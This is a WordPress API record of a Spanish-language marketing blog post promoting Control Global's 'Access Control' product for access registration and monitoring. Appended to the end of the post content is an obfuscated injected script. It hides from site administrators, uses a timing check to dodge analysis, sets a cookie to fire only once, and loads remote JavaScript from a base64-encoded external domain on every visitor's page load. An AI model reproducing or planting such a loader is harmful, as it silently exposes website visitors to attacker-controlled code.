{"id":8875,"date":"2019-06-27T14:33:51","date_gmt":"2019-06-27T17:33:51","guid":{"rendered":"https:\/\/controlglobal.biz\/blog\/?p=8875"},"modified":"2025-11-04T15:24:47","modified_gmt":"2025-11-04T18:24:47","slug":"tecnologia-de-fiscalizacion","status":"publish","type":"post","link":"https:\/\/controlglobal.biz\/blog\/2019\/06\/27\/tecnologia-de-fiscalizacion\/","title":{"rendered":"\u00a0Del control de accesos a la tecnolog\u00eda de fiscalizaci\u00f3n\u00a0"},"content":{"rendered":"\n<p class=\"has-text-align-left\"><span style=\"font-weight: 400;\"><span style=\"vertical-align: inherit;\"><span style=\"vertical-align: inherit;\">Un control de acceso es un procedimiento que permite que una persona entre a un lugar con una identificaci\u00f3n previa de alg\u00fan tipo.<\/span><\/span><\/span> <span style=\"font-weight: 400;\"><span style=\"vertical-align: inherit;\"><span style=\"vertical-align: inherit;\">Este mecanismo permite la apertura de una puerta o el acceso a un recurso, como una cerradura o un molinete.<\/span><\/span><\/span><\/p>\n\n\n\n<p class=\"has-text-align-left\"><span style=\"font-weight: 400;\"><span style=\"vertical-align: inherit;\"><span style=\"vertical-align: inherit;\">La evoluci\u00f3n de los sistemas de control de accesos hoy tiene que ver con las tarjetas magn\u00e9ticas o llaves <\/span><\/span><\/span><span style=\"font-weight: 400;\"><span style=\"vertical-align: inherit;\"><span style=\"vertical-align: inherit;\">electr\u00f3nicas. <\/span><span style=\"vertical-align: inherit;\">Estos permiten la identificaci\u00f3n, pero no la autenticaci\u00f3n de los datos ingresados. <\/span><span style=\"vertical-align: inherit;\">Si bien este sistema puede almacenar los datos de las tarjetas o la etiqueta en los terminales de registro, <strong>tienen la seria desventaja de no otorgar los datos en el momento en forma remota, lo que ha sido un inconveniente en los protocolos de seguridad.&nbsp;<\/strong><\/span><\/span><\/span><\/p>\n\n\n\n<p class=\"has-text-align-left\"><span style=\"font-weight: 400;\"><span style=\"vertical-align: inherit;\"><span style=\"vertical-align: inherit;\">Los sistemas de accesos modernos se basan en las nuevas tecnolog\u00edas que integran la seguridad con conectividad, pero con algunos problemas en la conexi\u00f3n porque la operaci\u00f3n depende del funcionamiento de internet, en otros casos, los sistemas que no se conectan cuando se trata de un inconveniente en la red o la se\u00f1al es baja. <\/span><\/span><\/span><\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-style-large is-layout-flow wp-block-quote-is-layout-flow\"><p><strong>Es necesario un sistema que permita superar estos problemas que afectan la seguridad.<\/strong><\/p><\/blockquote>\n\n\n\n<p class=\"has-text-align-left\"><span style=\"font-weight: 400;\">&nbsp;<\/span><span style=\"font-weight: 400;\"><span style=\"vertical-align: inherit;\"><span style=\"vertical-align: inherit;\">El control de accesos es una de las funcionalidades de Access Control, solo representa el 1% de todo lo que puede realizar el entorno gracias al <\/span><\/span><\/span><b><span style=\"vertical-align: inherit;\"><span style=\"vertical-align: inherit;\">compromiso de ingenier\u00eda.&nbsp;<\/span><\/span><\/b><span style=\"font-weight: 400;\"><span style=\"vertical-align: inherit;\"><span style=\"vertical-align: inherit;\">&nbsp;<\/span><\/span><\/span><\/p>\n\n\n\n<h4 class=\"wp-block-heading\"><span style=\"font-weight: 400;\"><span style=\"vertical-align: inherit;\"><span style=\"vertical-align: inherit;\">Access Control es la transformaci\u00f3n tecnol\u00f3gica en los sistemas de control de acceso, automatiza el <\/span><\/span><b><span style=\"vertical-align: inherit;\"><span style=\"vertical-align: inherit;\">registro, control, verificaci\u00f3n y monitoreo<\/span><\/span><\/b><span style=\"vertical-align: inherit;\"><span style=\"vertical-align: inherit;\"> , otorgando as\u00ed la&nbsp; <\/span><\/span><b><span style=\"vertical-align: inherit;\"><span style=\"vertical-align: inherit;\">fiscalizaci\u00f3n<\/span><\/span><\/b><span style=\"vertical-align: inherit;\"><span style=\"vertical-align: inherit;\"> total de accesos.<\/span><\/span><\/span><\/h4>\n\n\n\n<p class=\"has-text-align-left\"><span style=\"font-weight: 400;\"><span style=\"vertical-align: inherit;\"><span style=\"vertical-align: inherit;\"><a aria-label=\"undefined (abre en una nueva pesta\u00f1a)\" href=\"https:\/\/controlglobal.biz\/control-de-acceso\" target=\"_blank\" rel=\"noreferrer noopener\">Access Control<\/a> ofrece m\u00f3dulos de software como:<\/span><\/span><\/span> Asambleas virtuales, incidencias<strong><em>,&nbsp;&nbsp;<\/em><\/strong>comunicaciones, asistencia, expensas, denuncias de infracci\u00f3n y reserva de recursos.<\/p>\n\n\n\n<p class=\"has-text-align-left\"><span style=\"font-weight: 400;\"><span style=\"vertical-align: inherit;\"><span style=\"vertical-align: inherit;\">La integraci\u00f3n del hardware y el software de <a aria-label=\"undefined (abre en una nueva pesta\u00f1a)\" href=\"https:\/\/controlglobal.biz\/control-de-acceso\" target=\"_blank\" rel=\"noreferrer noopener\">Access Control<\/a>&nbsp;habilita un procedimiento automatizado. Funciona con el registro previo en la plataforma de gesti\u00f3n: el registro de identificaci\u00f3n (puede a\u00f1adir m\u00e9todos de autenticaci\u00f3n, opcionales como el DNI, huella, pin y pass). <\/span><\/span><\/span><\/p>\n\n\n\n<p class=\"has-text-align-left\"><span style=\"font-weight: 400;\"><span style=\"vertical-align: inherit;\"><span style=\"vertical-align: inherit;\">Los datos para habilitar el punto de control son ingresados \u200b\u200ben un teclado y enviados a una unidad de monitoreo, <\/span><\/span><\/span> <span style=\"font-weight: 400;\"><span style=\"vertical-align: inherit;\"><span style=\"vertical-align: inherit;\">donde se produce un intercambio de datos para habilitar el acceso que puede ser un recurso f\u00edsico o l\u00f3gico, en el caso de un sistema de operaci\u00f3n .&nbsp;&nbsp;<\/span><\/span><\/span><\/p>\n\n\n\n<p class=\"has-text-align-left\"><span style=\"font-weight: 400;\">Todo este desarrollo es posible por Control Global, empresa de soluciones tecnol\u00f3gicas&nbsp;que desarrolla <\/span><b>Access Control: <\/b><span style=\"font-weight: 400;\">no existen registros de un sistema tan complejo en cuanto a las caracter\u00edsticas&nbsp; y tan simple de implementar. <\/span><\/p>\n\n\n\n<p class=\"has-text-align-left\"><span style=\"font-weight: 400;\"><a aria-label=\"undefined (abre en una nueva pesta\u00f1a)\" href=\"https:\/\/controlglobal.biz\/control-de-acceso\" target=\"_blank\" rel=\"noreferrer noopener\">Access Control<\/a> puede integrarse en un sistema simple o complejo, logrando la tan ansiada <\/span><b>escalabilidad<\/b><span style=\"font-weight: 400;\">&nbsp;sin tener que a\u00f1adir nuevas tecnolog\u00edas, si no aplicaciones web que funcionan en cientos de diferentes escenarios.&nbsp;<\/span><\/p>\n\n\n\n<p class=\"has-text-align-left\"><span style=\"font-weight: 400;\">De esta forma Access Control se convierte en una experiencia aumentada en la fiscalizaci\u00f3n de datos y registros&nbsp;desarrollando la <\/span><b>eficiencia en la toma de decisiones y la reducci\u00f3n de costos operativos.<\/b><\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-style-large is-layout-flow wp-block-quote-is-layout-flow\"><p>Otra tecnolog\u00eda de Control Global<\/p><\/blockquote>\n\n\n\n<div class=\"wp-block-buttons aligncenter is-layout-flex wp-block-buttons-is-layout-flex\">\n<div class=\"wp-block-button is-style-outline is-style-outline--1\"><a class=\"wp-block-button__link\" href=\"https:\/\/controlglobal.biz\/control-de-acceso#contacto\" target=\"_blank\" rel=\"noreferrer noopener\">contactanos <\/a><\/div>\n<\/div>\n<script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script>","protected":false},"excerpt":{"rendered":"<p>Un control de acceso es un procedimiento que permite que una persona entre a un lugar con una identificaci\u00f3n previa de alg\u00fan tipo. Este mecanismo permite la apertura de una puerta o el acceso a un recurso, como una cerradura o un molinete. La evoluci\u00f3n de los sistemas de control de accesos hoy tiene que [&hellip;]<\/p>\n","protected":false},"author":6,"featured_media":8901,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[97],"tags":[],"class_list":["post-8875","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-control-de-accesos"],"_links":{"self":[{"href":"https:\/\/controlglobal.biz\/blog\/wp-json\/wp\/v2\/posts\/8875","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/controlglobal.biz\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/controlglobal.biz\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/controlglobal.biz\/blog\/wp-json\/wp\/v2\/users\/6"}],"replies":[{"embeddable":true,"href":"https:\/\/controlglobal.biz\/blog\/wp-json\/wp\/v2\/comments?post=8875"}],"version-history":[{"count":22,"href":"https:\/\/controlglobal.biz\/blog\/wp-json\/wp\/v2\/posts\/8875\/revisions"}],"predecessor-version":[{"id":10962,"href":"https:\/\/controlglobal.biz\/blog\/wp-json\/wp\/v2\/posts\/8875\/revisions\/10962"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/controlglobal.biz\/blog\/wp-json\/wp\/v2\/media\/8901"}],"wp:attachment":[{"href":"https:\/\/controlglobal.biz\/blog\/wp-json\/wp\/v2\/media?parent=8875"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/controlglobal.biz\/blog\/wp-json\/wp\/v2\/categories?post=8875"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/controlglobal.biz\/blog\/wp-json\/wp\/v2\/tags?post=8875"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}